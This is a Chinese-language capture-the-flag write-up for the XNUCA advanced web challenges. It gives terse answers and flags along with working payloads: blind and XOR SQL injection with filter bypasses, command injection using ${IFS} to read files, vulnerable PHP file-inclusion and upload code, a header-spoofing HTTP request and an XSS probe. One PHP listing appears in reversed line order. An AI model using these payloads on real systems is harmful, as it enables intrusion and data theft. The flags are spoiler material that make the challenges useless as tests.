XNUCA 進(jìn)階篇writeup

看一航寫(xiě)了些就去看了下，大多比較基礎(chǔ)，直接報(bào)答案

default

陽(yáng)關(guān)總在風(fēng)雨后

題目過(guò)濾很多，*，#，/ ，and,or,|，union,空格，都不能用

盲注，最后的姿勢(shì)是：1'%(1)%'1

中間的括號(hào)的位置是提交查詢(xún)語(yǔ)句的地方，由于過(guò)濾了 or 所以只能使用mid from 的姿勢(shì)對(duì)字符串進(jìn)行截取

uname=1'%(ascii(mid((select(group_concat(passwd))from(admin))from(1)))>1)%'1

還有一種一航的可以使用異或符號(hào)
uname=admin'^!1^'1

腳本跑出：50f87a3a3ad48e26a5d9058418fb78b5
解密是得到 shuangshuang，然后進(jìn)行登錄
登錄上去之后是一個(gè)命令執(zhí)行

• 過(guò)濾了空格
• 過(guò)濾了php字符
• 權(quán)限只有只讀
• 顯示只顯示命令結(jié)果的最后一行

繞過(guò)方法如下：

• 使用${IFS}代替空格,已附參考鏈接
• 命令后面添加 | head -n 1 繞過(guò)只顯示最后一行

所以我們執(zhí)行的命令依次為

• ls${IFS}/var/www/html|head${IFS}-n${IFS}1
• ls${IFS}/var/www/html/9ef89ad913e848b64b73e3aa721e44e4|head${IFS}-n${IFS}1
• cat${IFS}/var/www/html/9ef89ad913e848b64b73e3aa721e44e4/*|head${IFS}-n${IFS}1

Document

• 看源碼

Tips: the parameter is file! :) 
<!-- upload.php -->
</html>
<?php
    @$file = $_GET["file"];
    if(isset($file))
    {
        if (preg_match('/http|data|ftp|input|%00/i', $file) || strstr($file,"..") !== FALSE || strlen($file)>=70)
        {
            echo "<p> error! </p>";
        }
        else
        {
            include($file.'.php');
        }
    }
?>

<form action="" enctype="multipart/form-data" method="post" 
name="upload">file:<input type="file" name="file" /><br> 
<input type="submit" value="upload" /></form>

<?php
if(!empty($_FILES["file"]))
{
    echo $_FILES["file"];
    $allowedExts = array("gif", "jpeg", "jpg", "png");
    @$temp = explode(".", $_FILES["file"]["name"]);
    $extension = end($temp);
    if (((@$_FILES["file"]["type"] == "image/gif") || (@$_FILES["file"]["type"] == "image/jpeg")
    || (@$_FILES["file"]["type"] == "image/jpg") || (@$_FILES["file"]["type"] == "image/pjpeg")
    || (@$_FILES["file"]["type"] == "image/x-png") || (@$_FILES["file"]["type"] == "image/png"))
    && (@$_FILES["file"]["size"] < 102400) && in_array($extension, $allowedExts))
    {
        move_uploaded_file($_FILES["file"]["tmp_name"], "upload/" . $_FILES["file"]["name"]);
        echo "file upload successful!Save in:  " . "upload/" . $_FILES["file"]["name"];
    }
    else
    {
        echo "upload failed!";
    }
}
?>

login

<?php
$login=@$_POST['login'];
$password=@$_POST['password'];
if(@$login=="admin" && sha1(@$password)==$pwhash){
    include('flag.txt');
}else if (@$login&&@$password&&@$_GET['debug']) {
    echo "Login error, login credentials has been saved to ./log/".htmlentities($login).".log";
    $logfile = "./log/".$login.".log";
    file_put_contents($logfile, $login."\n".$password);
} 
?>
    <center>
        login<br/><br/>
        <form action="" method="POST">
            <input name="login" placeholder="login"><br/>
            <input name="password" placeholder="password"><br/><br/>
            <input type="submit" value="Go!">
        </form>
    </center>

捉迷藏

修改背景色

vote

echo '<br><a href="index.php">goBack</a><br>';
echo '</table>';
echo '<td>'.$arr[0].'</td><td>'.round($arr[1], 2).'</td></tr>';
$arr = mysql_fetch_array(mysql_query("SELECT COUNT(value), AVG(value) FROM t_vote WHERE id = ".$r['id']));
echo '<tr><td>'.$arr[0].'</td>';
$arr = mysql_fetch_array(mysql_query("SELECT title FROM t_picture WHERE id = ".$r['id']));
while ($r = mysql_fetch_array($q)) {
    echo '<tr><th>Logo</th><th>Total votes</th><th>Average</th></tr>';
    echo '<table border="1">';
    echo '<p><b>Thank you!</b> Results:</p>';
    
    
    $q = mysql_query("SELECT id FROM t_vote WHERE user = '{$login}' GROUP BY id");
    $q = mysql_query("INSERT INTO t_vote VALUES ({$id}, {$vote}, '{$login}')");
    $vote = 1;
    if ($vote > 5 || $vote < 1) $vote = (int) $_POST['vote'];
    $id = $_POST['id'];
    die('please select ...');
    if (!isset($_POST['id'], $_POST['vote']) || !is_numeric($_POST['id'])) if (isset($_POST['submit'])) {
        $login = $_SESSION['login'];
    }
    $_SESSION['login'] = 'guest'.mt_rand(1e5, 1e6);
    if (!isset($_SESSION['login'])) {
        session_start();
        include 'db.php'; < ?

應(yīng)該是個(gè)二次注入沒(méi)開(kāi)虛擬機(jī)，明天再試

DrinkCoffee

解這個(gè)得到cafe,最后提交

POST / HTTP/1.1
Host: 218.76.35.75:65280
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 13
X-Forwarded-For: 10.10.20.1
Referer: http://www.iie.ac.cn 
Cookie: PHPSESSID=u3dn1o0ldnv8e244foo5kudvq4
Connection: close
Upgrade-Insecure-Requests: 1

password=cafe

php是門(mén)松散的語(yǔ)言

簡(jiǎn)單問(wèn)答

后臺(tái)

php是最好的語(yǔ)言

HTTP頭注入

簡(jiǎn)單的文件上傳

修改一下content-type

簡(jiǎn)單的js

char = (60,105,102,114,97,109,101,32,104,101,105,103,104,116,61,48,32,119,105,100,116,104,61,48,32,115,114,99,61,34,46,47,102,108,48,97,46,112,104,112,34,62)
password = ''
for i in char:
    password += chr(i)

print password
//"./fl0a.php"

訪問(wèn)然后查看請(qǐng)求頭即可
C00k1els60SecU5e

試試xss

' /><script>alert(document.domain)</script>

簡(jiǎn)單的文件包含

然后訪問(wèn)鏈接即可

簡(jiǎn)單的驗(yàn)證

爆破guess的值，得到573

EaSy70Ch1ngG00kie

GG

前端題，只發(fā)現(xiàn)一個(gè)js,copy ,復(fù)制到 firefox的console,然后美化源代碼，耐心點(diǎn)看

'webqwer'[1] + '100.js'
所以就是 e100.js

Reappear

e...是一個(gè)反的base64，利用py的切片操作：flag:{uveDoneAgreatJob}

比較基礎(chǔ)，還有兩題未解，有些不值得那些時(shí)間，玩一下還是挺好的